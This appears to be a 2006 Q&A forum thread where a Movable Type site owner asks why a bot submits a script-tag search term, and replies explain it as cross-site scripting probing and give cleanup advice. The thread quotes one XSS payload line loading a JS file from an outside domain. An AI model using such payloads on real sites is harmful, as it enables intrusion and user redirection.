Why is this bot hitting my site?
September 20, 2006 1:38 PM   Subscribe

Some sort of bot is hitting my web site, and for the life of me I can't figure out why.

I run a large installation of Movable Type, and for the past few days a script has been submitting the following search term via my site-side search form:


As you can see, it's a script call to a JS file. I've checked out the contents of this file, and literally all it does is push you to google.com.

I identifed the 10 or so IP addresses the bot comes from, and banned them from using the search form, so I hope I have it handled.

I know I'm not the only MT user experiencing this, but the only reason I noticed is because I publish the latest search results to the home page, which means I was getting reports of users being kicked from my site to Google, without explanation. Otherwise, there would have been no sign of it.

Why would someone do this?
posted by o2b to Computers & Internet (13 answers total) 4 users marked this as a favorite
Response by poster: Oh crap, the preview stripped out my html entities, which means the HTML got parsed out.

Here's the search term:

[script src=http://usuc.us/j.js]jonny[/script]
posted by o2b at 1:41 PM on September 20, 2006

Best answer: Somebody is searching for XSS vulnerabilities, and they found one.

Looks live you've got a pretty major security problem with the way you're publishing searches to your home page. You probably ought to take down that "feature" until you learn about XSS and how to prevent it.
posted by jacobian at 1:49 PM on September 20, 2006 [1 favorite]

Response by poster: Ah. Ok.

So the referral logs on his server track where the hits to the script are coming from, so they know which sites are vulnerable.
posted by o2b at 1:59 PM on September 20, 2006

Response by poster: Ok, I have sealed that security hole. Thanks.
posted by o2b at 2:05 PM on September 20, 2006

Scienceblogs.com was having the same problem with the same domain implicated in the links (they use MT). I have a feeling this is pretty widespread, and not targetted just at you.
posted by chrisamiller at 3:11 PM on September 20, 2006

The jonny spammer hit my blog too, kindly alerting me to a quickly-plugged XSS vuln. He's all over the place, actually-just check Google for links to his domain, usuc.us.
posted by evariste at 4:08 PM on September 20, 2006

Wow, it's really gone up since last week when I noticed jonny and Googled him. 36,300 sites.

I can't wait to see what he's gonna change the j.js file to do, eventually. I assume this is leading up to something pretty big.
posted by evariste at 4:11 PM on September 20, 2006

Yikes! If I use MT and don't really understand what you guys are talking about, should I do something to protect myself?
posted by croutonsupafreak at 4:27 PM on September 20, 2006

Ditto here, what's going on? Because I just tested it on my own mt-search before I belatedly realized I had just pinged him with my own potential vulnerability.
posted by brownpau at 4:48 PM on September 20, 2006

Crappity crap crap crap: Now when I view my activity log, it redirects to Google. And if I'm seeing this right, you don't even need to be publishing search results to the home page for the vulnerability to work, someone just has to load mt-search.cgi with that in the REQUEST. Someone like jonny.

Great work not parsing special characters in the log table or the search script, SixApart. This is in MT 3.32, the latest version. 3.33 better fix this before jonny decides to take this vulnerability to town.
posted by brownpau at 4:55 PM on September 20, 2006

You guys will want to go into MySQL and TRUNCATE TABLE `mt_log` to get jonny out of your activity log. Comments and Trackback don't publish script tags even with HTML enabled. Where else in MT does this XSS vulnerability need to be addressed?
posted by brownpau at 4:59 PM on September 20, 2006

croutonsupafreak: don't freak.

Don't look at your activity log with Javascript turned on until the 6 Apart folks can get out a patch, and don't publish your search queries on your blog. If you're doing neither thing, you're reasonably safe from jonny.
posted by evariste at 5:35 PM on September 20, 2006

For those who don't have to deal with this stuff on a daily basis, here's a (very) quick XSS primer:

If your site accepts some kind of input from a user and then displays it somewhere else on the site, a malicious user can carefully craft an input that to Do Stuff. What that stuff is can vary quite a bit, but the really important point is that from the perspective of the user, the code is executing as a part of your website. In this example, the code simply includes a javascript file that redirects the entire page to google.com.

Basically, you have to strip out executable javascript from any input you receive, especially input you're going to display.
posted by Skorgu at 10:06 AM on September 21, 2006

« Older Help me find a classic Spy Magazine Article   |   Oh, the price paid for beauty! Newer »
This thread is closed to new comments.